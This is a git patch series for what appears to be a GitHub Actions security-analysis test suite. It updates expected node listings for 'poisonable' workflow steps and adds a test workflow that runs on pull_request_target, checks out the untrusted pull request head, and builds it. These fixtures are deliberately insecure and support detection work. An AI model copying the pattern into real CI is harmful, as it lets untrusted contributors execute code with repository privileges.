&& python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| 
.github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css 
| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | 
.github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | 
.github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | 
.github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| 
.github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | 
.github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -588,11 +665,11 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | 
@@ -629,8 +706,30 @@ cfgNodes | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > 
foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -709,7 +808,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | 
@@ -746,8 +845,30 @@ dfNodes | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > 
foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | @@ -828,7 +949,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:29:43 | .github/workflows/poisonable_steps.yml@5:5:29:43 | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:40:74 | .github/workflows/poisonable_steps.yml@5:5:40:74 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | 
@@ -865,8 +986,30 @@ nodeLocations | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:9:29:43 | .github/workflows/poisonable_steps.yml@29:9:29:43 | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:9:30:6 | .github/workflows/poisonable_steps.yml@29:9:30:6 | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:9:31:6 | .github/workflows/poisonable_steps.yml@30:9:31:6 | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:14:30:46 | .github/workflows/poisonable_steps.yml@30:14:30:46 | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:9:32:6 | .github/workflows/poisonable_steps.yml@31:9:32:6 | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:14:31:44 | .github/workflows/poisonable_steps.yml@31:14:31:44 | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | 
.github/workflows/poisonable_steps.yml:32:9:33:6 | .github/workflows/poisonable_steps.yml@32:9:33:6 | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:14:32:44 | .github/workflows/poisonable_steps.yml@32:14:32:44 | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:9:34:6 | .github/workflows/poisonable_steps.yml@33:9:34:6 | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:14:33:35 | .github/workflows/poisonable_steps.yml@33:14:33:35 | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:9:35:6 | .github/workflows/poisonable_steps.yml@34:9:35:6 | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:14:34:52 | .github/workflows/poisonable_steps.yml@34:14:34:52 | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:9:36:6 | .github/workflows/poisonable_steps.yml@35:9:36:6 | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:14:35:26 | .github/workflows/poisonable_steps.yml@35:14:35:26 | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:9:37:6 | .github/workflows/poisonable_steps.yml@36:9:37:6 | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:14:36:86 | .github/workflows/poisonable_steps.yml@36:14:36:86 | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:9:38:6 | .github/workflows/poisonable_steps.yml@37:9:38:6 | +| 
.github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:14:37:51 | .github/workflows/poisonable_steps.yml@37:14:37:51 | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:9:39:6 | .github/workflows/poisonable_steps.yml@38:9:39:6 | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:9:40:74 | .github/workflows/poisonable_steps.yml@40:9:40:74 | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | 
@@ -887,7 +1030,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | From e23054292b86b7b1005595849b19e267f44a95bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 11:49:02 +0200 Subject: [PATCH 0388/1267] feat(tests): Add new tests Add new tests to verify that even if a job is privileged, if the vulnerability takes place in a different one, it should be considered as non-priveleged and reported as Cache Poisoning instead of Untrusted Checkout --- .../CWE-349/.github/workflows/test21.yml | 44 +++++++++++++++++++ .../Security/CWE-349/CachePoisoning.expected | 2 + .../CWE-829/.github/workflows/test8.yml | 44 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 1 + .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 5 files changed, 92 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml new file mode 100644 index 00000000000..381cc16a6d1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml 
@@ -0,0 +1,44 @@
+name: OpenAPI
+on:
+ push:
+ branches:
+ - master
+ tags:
+ - 'v*'
+ pull_request_target:
+
+permissions: {}
+
+jobs:
+
+ openapi-base:
+ name: OpenAPI - BASE
+ if: ${{ github.base_ref != '' }}
+ runs-on: ubuntu-latest
+ permissions: read-all
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ fetch-depth: 0
+ - name: Generate openapi.json
+ run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests"
+
+ publish-unstable:
+ name: OpenAPI - Publish Unstable Spec
